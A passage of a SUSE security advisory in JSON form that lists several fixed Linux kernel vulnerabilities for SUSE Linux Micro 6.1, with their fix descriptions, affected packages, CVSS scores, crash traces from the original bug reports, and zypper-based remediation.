"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54143",
"url": "https://www.suse.com/security/cve/CVE-2023-54143"
},
{
"category": "external",
"summary": "SUSE Bug 1256096 for CVE-2023-54143",
"url": "https://bugzilla.suse.com/1256096"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54143"
},
{
"cve": "CVE-2023-54145",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54145"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: drop unnecessary user-triggerable WARN_ONCE in verifierl log\n\nIt\u0027s trivial for user to trigger \"verifier log line truncated\" warning,\nas verifier has a fixed-sized buffer of 1024 bytes (as of now), and there are at\nleast two pieces of user-provided information that can be output through\nthis buffer, and both can be arbitrarily sized by user:\n - BTF names;\n - BTF.ext source code lines strings.\n\nVerifier log buffer should be properly sized for typical verifier state\noutput. But it\u0027s sort-of expected that this buffer won\u0027t be long enough\nin some circumstances. So let\u0027s drop the check. In any case code will\nwork correctly, at worst truncating a part of a single line output.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54145",
"url": "https://www.suse.com/security/cve/CVE-2023-54145"
},
{
"category": "external",
"summary": "SUSE Bug 1256090 for CVE-2023-54145",
"url": "https://bugzilla.suse.com/1256090"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54145"
},
{
"cve": "CVE-2023-54148",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54148"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Move representor neigh cleanup to profile cleanup_tx\n\nFor IP tunnel encapsulation in ECMP (Equal-Cost Multipath) mode, as\nthe flow is duplicated to the peer eswitch, the related neighbour\ninformation on the peer uplink representor is created as well.\n\nIn the cited commit, eswitch devcom unpair is moved to uplink unload\nAPI, specifically the profile-\u003ecleanup_tx. If there is a encap rule\noffloaded in ECMP mode, when one eswitch does unpair (because of\nunloading the driver, for instance), and the peer rule from the peer\neswitch is going to be deleted, the use-after-free error is triggered\nwhile accessing neigh info, as it is already cleaned up in uplink\u0027s\nprofile-\u003edisable, which is before its profile-\u003ecleanup_tx.\n\nTo fix this issue, move the neigh cleanup to profile\u0027s cleanup_tx\ncallback, and after mlx5e_cleanup_uplink_rep_tx is called. The neigh\ninit is moved to init_tx for symmeter.\n\n[ 2453.376299] BUG: KASAN: slab-use-after-free in mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core]\n[ 2453.379125] Read of size 4 at addr ffff888127af9008 by task modprobe/2496\n\n[ 2453.381542] CPU: 7 PID: 2496 Comm: modprobe Tainted: G B 6.4.0-rc7+ #15\n[ 2453.383386] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n[ 2453.384335] Call Trace:\n[ 2453.384625] \u003cTASK\u003e\n[ 2453.384891] dump_stack_lvl+0x33/0x50\n[ 2453.385285] print_report+0xc2/0x610\n[ 2453.385667] ? __virt_addr_valid+0xb1/0x130\n[ 2453.386091] ? mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core]\n[ 2453.386757] kasan_report+0xae/0xe0\n[ 2453.387123] ? mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core]\n[ 2453.387798] mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core]\n[ 2453.388465] mlx5e_rep_encap_entry_detach+0xa6/0xe0 [mlx5_core]\n[ 2453.389111] mlx5e_encap_dealloc+0xa7/0x100 [mlx5_core]\n[ 2453.389706] mlx5e_tc_tun_encap_dests_unset+0x61/0xb0 [mlx5_core]\n[ 2453.390361] mlx5_free_flow_attr_actions+0x11e/0x340 [mlx5_core]\n[ 2453.391015] ? complete_all+0x43/0xd0\n[ 2453.391398] ? free_flow_post_acts+0x38/0x120 [mlx5_core]\n[ 2453.392004] mlx5e_tc_del_fdb_flow+0x4ae/0x690 [mlx5_core]\n[ 2453.392618] mlx5e_tc_del_fdb_peers_flow+0x308/0x370 [mlx5_core]\n[ 2453.393276] mlx5e_tc_clean_fdb_peer_flows+0xf5/0x140 [mlx5_core]\n[ 2453.393925] mlx5_esw_offloads_unpair+0x86/0x540 [mlx5_core]\n[ 2453.394546] ? mlx5_esw_offloads_set_ns_peer.isra.0+0x180/0x180 [mlx5_core]\n[ 2453.395268] ? down_write+0xaa/0x100\n[ 2453.395652] mlx5_esw_offloads_devcom_event+0x203/0x530 [mlx5_core]\n[ 2453.396317] mlx5_devcom_send_event+0xbb/0x190 [mlx5_core]\n[ 2453.396917] mlx5_esw_offloads_devcom_cleanup+0xb0/0xd0 [mlx5_core]\n[ 2453.397582] mlx5e_tc_esw_cleanup+0x42/0x120 [mlx5_core]\n[ 2453.398182] mlx5e_rep_tc_cleanup+0x15/0x30 [mlx5_core]\n[ 2453.398768] mlx5e_cleanup_rep_tx+0x6c/0x80 [mlx5_core]\n[ 2453.399367] mlx5e_detach_netdev+0xee/0x120 [mlx5_core]\n[ 2453.399957] mlx5e_netdev_change_profile+0x84/0x170 [mlx5_core]\n[ 2453.400598] mlx5e_vport_rep_unload+0xe0/0xf0 [mlx5_core]\n[ 2453.403781] mlx5_eswitch_unregister_vport_reps+0x15e/0x190 [mlx5_core]\n[ 2453.404479] ? mlx5_eswitch_register_vport_reps+0x200/0x200 [mlx5_core]\n[ 2453.405170] ? up_write+0x39/0x60\n[ 2453.405529] ? kernfs_remove_by_name_ns+0xb7/0xe0\n[ 2453.405985] auxiliary_bus_remove+0x2e/0x40\n[ 2453.406405] device_release_driver_internal+0x243/0x2d0\n[ 2453.406900] ? kobject_put+0x42/0x2d0\n[ 2453.407284] bus_remove_device+0x128/0x1d0\n[ 2453.407687] device_del+0x240/0x550\n[ 2453.408053] ? waiting_for_supplier_show+0xe0/0xe0\n[ 2453.408511] ? kobject_put+0xfa/0x2d0\n[ 2453.408889] ? __kmem_cache_free+0x14d/0x280\n[ 2453.409310] mlx5_rescan_drivers_locked.part.0+0xcd/0x2b0 [mlx5_core]\n[ 2453.409973] mlx5_unregister_device+0x40/0x50 [mlx5_core]\n[ 2453.410561] mlx5_uninit_one+0x3d/0x110 [mlx5_core]\n[ 2453.411111] remove_one+0x89/0x130 [mlx5_core]\n[ 24\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54148",
"url": "https://www.suse.com/security/cve/CVE-2023-54148"
},
{
"category": "external",
"summary": "SUSE Bug 1256084 for CVE-2023-54148",
"url": "https://bugzilla.suse.com/1256084"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54148"
},
{
"cve": "CVE-2023-54149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: dsa: avoid suspicious RCU usage for synced VLAN-aware MAC addresses\n\nWhen using the felix driver (the only one which supports UC filtering\nand MC filtering) as a DSA master for a random other DSA switch, one can\nsee the following stack trace when the downstream switch ports join a\nVLAN-aware bridge:\n\n=============================\nWARNING: suspicious RCU usage\n-----------------------------\nnet/8021q/vlan_core.c:238 suspicious rcu_dereference_protected() usage!\n\nstack backtrace:\nWorkqueue: dsa_ordered dsa_slave_switchdev_event_work\nCall trace:\n lockdep_rcu_suspicious+0x170/0x210\n vlan_for_each+0x8c/0x188\n dsa_slave_sync_uc+0x128/0x178\n __hw_addr_sync_dev+0x138/0x158\n dsa_slave_set_rx_mode+0x58/0x70\n __dev_set_rx_mode+0x88/0xa8\n dev_uc_add+0x74/0xa0\n dsa_port_bridge_host_fdb_add+0xec/0x180\n dsa_slave_switchdev_event_work+0x7c/0x1c8\n process_one_work+0x290/0x568\n\nWhat it\u0027s saying is that vlan_for_each() expects rtnl_lock() context and\nit\u0027s not getting it, when it\u0027s called from the DSA master\u0027s ndo_set_rx_mode().\n\nThe caller of that - dsa_slave_set_rx_mode() - is the slave DSA\ninterface\u0027s dsa_port_bridge_host_fdb_add() which comes from the deferred\ndsa_slave_switchdev_event_work().\n\nWe went to great lengths to avoid the rtnl_lock() context in that call\npath in commit 0faf890fc519 (\"net: dsa: drop rtnl_lock from\ndsa_slave_switchdev_event_work\"), and calling rtnl_lock() is simply not\nan option due to the possibility of deadlocking when calling\ndsa_flush_workqueue() from the call paths that do hold rtnl_lock() -\nbasically all of them.\n\nSo, when the DSA master calls vlan_for_each() from its ndo_set_rx_mode(),\nthe state of the 8021q driver on this device is really not protected\nfrom concurrent access by anything.\n\nLooking at net/8021q/, I don\u0027t think that vlan_info-\u003evid_list was\nparticularly designed with RCU traversal in mind, so introducing an RCU\nread-side form of vlan_for_each() - vlan_for_each_rcu() - won\u0027t be so\neasy, and it also wouldn\u0027t be exactly what we need anyway.\n\nIn general I believe that the solution isn\u0027t in net/8021q/ anyway;\nvlan_for_each() is not cut out for this task. DSA doesn\u0027t need rtnl_lock()\nto be held per se - since it\u0027s not a netdev state change that we\u0027re\nblocking, but rather, just concurrent additions/removals to a VLAN list.\nWe don\u0027t even need sleepable context - the callback of vlan_for_each()\njust schedules deferred work.\n\nThe proposed escape is to remove the dependency on vlan_for_each() and\nto open-code a non-sleepable, rtnl-free alternative to that, based on\ncopies of the VLAN list modified from .ndo_vlan_rx_add_vid() and\n.ndo_vlan_rx_kill_vid().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54149",
"url": "https://www.suse.com/security/cve/CVE-2023-54149"
},
{
"category": "external",
"summary": "SUSE Bug 1256085 for CVE-2023-54149",
"url": "https://bugzilla.suse.com/1256085"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54149"
},
{
"cve": "CVE-2023-54153",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54153"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: turn quotas off if mount failed after enabling quotas\n\nYi found during a review of the patch \"ext4: don\u0027t BUG on inconsistent\njournal feature\" that when ext4_mark_recovery_complete() returns an error\nvalue, the error handling path does not turn off the enabled quotas,\nwhich triggers the following kmemleak:\n\n================================================================\nunreferenced object 0xffff8cf68678e7c0 (size 64):\ncomm \"mount\", pid 746, jiffies 4294871231 (age 11.540s)\nhex dump (first 32 bytes):\n00 90 ef 82 f6 8c ff ff 00 00 00 00 41 01 00 00 ............A...\nc7 00 00 00 bd 00 00 00 0a 00 00 00 48 00 00 00 ............H...\nbacktrace:\n[\u003c00000000c561ef24\u003e] __kmem_cache_alloc_node+0x4d4/0x880\n[\u003c00000000d4e621d7\u003e] kmalloc_trace+0x39/0x140\n[\u003c00000000837eee74\u003e] v2_read_file_info+0x18a/0x3a0\n[\u003c0000000088f6c877\u003e] dquot_load_quota_sb+0x2ed/0x770\n[\u003c00000000340a4782\u003e] dquot_load_quota_inode+0xc6/0x1c0\n[\u003c0000000089a18bd5\u003e] ext4_enable_quotas+0x17e/0x3a0 [ext4]\n[\u003c000000003a0268fa\u003e] __ext4_fill_super+0x3448/0x3910 [ext4]\n[\u003c00000000b0f2a8a8\u003e] ext4_fill_super+0x13d/0x340 [ext4]\n[\u003c000000004a9489c4\u003e] get_tree_bdev+0x1dc/0x370\n[\u003c000000006e723bf1\u003e] ext4_get_tree+0x1d/0x30 [ext4]\n[\u003c00000000c7cb663d\u003e] vfs_get_tree+0x31/0x160\n[\u003c00000000320e1bed\u003e] do_new_mount+0x1d5/0x480\n[\u003c00000000c074654c\u003e] path_mount+0x22e/0xbe0\n[\u003c0000000003e97a8e\u003e] do_mount+0x95/0xc0\n[\u003c000000002f3d3736\u003e] 